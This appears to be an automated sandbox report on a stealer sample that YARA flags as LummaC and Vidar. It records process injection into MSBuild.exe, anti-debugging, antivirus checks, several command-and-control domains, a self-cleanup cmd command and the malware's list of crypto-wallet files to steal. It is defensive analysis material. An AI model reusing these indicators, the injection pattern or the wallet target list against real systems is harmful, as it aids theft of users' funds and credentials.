Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B20AD VirtualProtect,LdrInitializeThunk,GetConsoleWindow,CallWindowProcW, 0_2_005B20AD
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005BB5D6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_005BB5D6
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00418A63 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00418A63
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B208F mov edi, dword ptr fs:[00000030h] 0_2_005B208F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005D937A mov eax, dword ptr fs:[00000030h] 0_2_005D937A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005D9362 mov eax, dword ptr fs:[00000030h] 0_2_005D9362
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005D9385 mov eax, dword ptr fs:[00000030h] 0_2_005D9385
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F0582 mov eax, dword ptr fs:[00000030h] 0_2_005F0582
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005C7ED8 mov eax, dword ptr fs:[00000030h] 0_2_005C7ED8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005BEE8C mov ecx, dword ptr fs:[00000030h] 0_2_005BEE8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004014AD mov eax, dword ptr fs:[00000030h] 1_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040148A mov eax, dword ptr fs:[00000030h] 1_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004014A2 mov eax, dword ptr fs:[00000030h] 1_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004186A9 mov eax, dword ptr fs:[00000030h] 1_2_004186A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004186AA mov eax, dword ptr fs:[00000030h] 1_2_004186AA
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0030208F mov edi, dword ptr fs:[00000030h] 8_2_0030208F
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0030EE8C mov ecx, dword ptr fs:[00000030h] 8_2_0030EE8C
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00317ED8 mov eax, dword ptr fs:[00000030h] 8_2_00317ED8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005CA4D7 GetProcessHeap, 0_2_005CA4D7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B7490 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_005B7490
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005BB5D6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_005BB5D6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B77B5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_005B77B5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B7942 SetUnhandledExceptionFilter, 0_2_005B7942
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041D12A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0041D12A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041DAAC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0041DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042774E SetUnhandledExceptionFilter, 1_2_0042774E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CADB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_6CADB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CADB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6CADB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC8AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6CC8AC62
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00307490 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00307490
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0030B5D6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_0030B5D6
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_003077B5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_003077B5
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00307942 SetUnhandledExceptionFilter, 8_2_00307942

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 6988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7032, type: MEMORYSTR
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\ProgramData\GCGHCBKFCF.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040F54A _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 1_2_0040F54A
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\ProgramData\GCGHCBKFCF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
LummaC encrypted strings found
Source: GCGHCBKFCF.exe String found in binary or memory: soldiefieop.site
Source: GCGHCBKFCF.exe String found in binary or memory: questionsmw.stor
Source: GCGHCBKFCF.exe String found in binary or memory: absorptioniw.site
Source: GCGHCBKFCF.exe String found in binary or memory: mysterisop.site
Source: GCGHCBKFCF.exe String found in binary or memory: snarlypagowo.site
Source: GCGHCBKFCF.exe String found in binary or memory: treatynreit.site
Source: GCGHCBKFCF.exe String found in binary or memory: chorusarorp.site
Source: GCGHCBKFCF.exe String found in binary or memory: abnomalrkmu.site
Searches for specific processes (likely to inject)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 1_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 1_2_0041257F
Writes to foreign memory regions
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E1B008 Jump to behavior
Source: C:\ProgramData\GCGHCBKFCF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\ProgramData\GCGHCBKFCF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\ProgramData\GCGHCBKFCF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000 Jump to behavior
Source: C:\ProgramData\GCGHCBKFCF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000 Jump to behavior
Source: C:\ProgramData\GCGHCBKFCF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000 Jump to behavior
Source: C:\ProgramData\GCGHCBKFCF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 71E008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\GCGHCBKFCF.exe "C:\ProgramData\GCGHCBKFCF.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CAKFIJDHJEGI" & exit Jump to behavior
Source: C:\ProgramData\GCGHCBKFCF.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005D9076 cpuid 0_2_005D9076
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_005CA0A0
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_005CA1A6
Source: C:\Users\user\Desktop\file.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_005CA275
Source: C:\Users\user\Desktop\file.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_005FF56E
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_005C1A32
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_005C9BFE
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_005C9BB3
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_005C9C99
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_005C9D24
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_005C1EDC
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_005C9F77
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 1_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_0042B1EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 1_2_0042B2E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 1_2_00429B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 1_2_0042B3E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 1_2_0042B388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 1_2_0042AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 1_2_00425503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 1_2_0042B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 1_2_004275BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesA, 1_2_0042B676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 1_2_00428EE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 1_2_00429E8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 1_2_0042E68F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 1_2_00427696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_0042B6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 1_2_0042B743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_0042B707
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA, 1_2_0042E7C4
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 8_2_0031A0A0
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: GetLocaleInfoW, 8_2_0031A1A6
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 8_2_0031A275
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: EnumSystemLocalesW, 8_2_00311A32
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: EnumSystemLocalesW, 8_2_00319BB3
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: EnumSystemLocalesW, 8_2_00319BFE
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: EnumSystemLocalesW, 8_2_00319C99
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 8_2_00319D24
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: GetLocaleInfoW, 8_2_00311EDC
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: GetLocaleInfoW, 8_2_00319F77
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B76AF GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_005B76AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA, 1_2_00410C53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 1_2_00410D2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s Defender\MsMpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001508000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 1.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5d8ad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5d8ad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1802985654.00000000005D8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7032, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet 